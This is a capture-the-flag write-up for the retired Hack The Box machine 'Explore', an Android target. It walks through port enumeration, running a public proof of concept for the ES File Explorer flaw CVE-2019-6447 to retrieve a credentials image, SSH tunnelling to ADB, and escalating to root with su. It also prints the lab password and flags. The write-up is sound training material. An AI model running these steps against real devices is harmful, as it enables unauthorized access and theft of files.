Security Blog, Rants, Raves, Write-ups, and Code
Explore
| Name: | Explore 
|
|---|---|
| Release Date: | 26 Jun 2021 |
| Retire Date: | 30 Oct 2021 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
JoshSH  00 days, 00 hours, 03 mins, 27 seconds |
 |
jkr  00 days, 00 hours, 18 mins, 56 seconds |
| Creator: | bertolis  |
| Pentest Workstation PDF: | Explore.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
Mirai
We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) that are the major ports that we need to look at right now. Gobuster found several pages and directories that could be interesting.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ gobuster dir -u http://10.10.10.247:59777 -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.247:59777
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
===============================================================
/acct (Status: 301) [Size: 65] [--> /acct/]
/bin (Status: 301) [Size: 63] [--> /bin/]
/cache (Status: 301) [Size: 67] [--> /cache/]
/config (Status: 301) [Size: 69] [--> /config/]
/d (Status: 301) [Size: 59] [--> /d/]
/data (Status: 301) [Size: 65] [--> /data/]
/dev (Status: 301) [Size: 63] [--> /dev/]
/etc (Status: 301) [Size: 63] [--> /etc/]
/init (Status: 403) [Size: 31]
/lib (Status: 301) [Size: 63] [--> /lib/]
/mnt (Status: 301) [Size: 63] [--> /mnt/]
/oem (Status: 301) [Size: 63] [--> /oem/]
/proc (Status: 301) [Size: 65] [--> /proc/]
/product (Status: 301) [Size: 71] [--> /product/]
/sbin (Status: 301) [Size: 65] [--> /sbin/]
/storage (Status: 301) [Size: 71] [--> /storage/]
/sys (Status: 301) [Size: 63] [--> /sys/]
/system (Status: 301) [Size: 69] [--> /system/]
/vendor (Status: 301) [Size: 69] [--> /vendor/]
===============================================================
2022/01/17 08:56:26 Finished
===============================================================
Researching 5555 and 59777, we can discover ES File Explorer and it's information and vulnerabilities. Two great resources for those two ports are:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the one we need is:
python3 poc.py --ip=10.10.10.247 -c listPics then
python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg
Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.
Kristi:Kr1sT!5h@Rp3xPl0r3!
This is obviously a phone, in case the ES File Explore wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
Now, if you recall port 5555 ADB was filtered, but what if we could utilize port tunneling to access it?
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb devices
List of devices attached
emulator-5554 device
localhost:5555 device
Notice there are two "devices" attached. We need to specify which one we want adb to connect to the shell on.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb -s localhost:5555 shell 1 ⨯
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # whoami
root
Gotcha!!! Now we search for root.txt and this phone will be toast.
:/ # find / -name root.txt
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
This was a completely different style of box/phone/thing.... But hey, another one down!
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.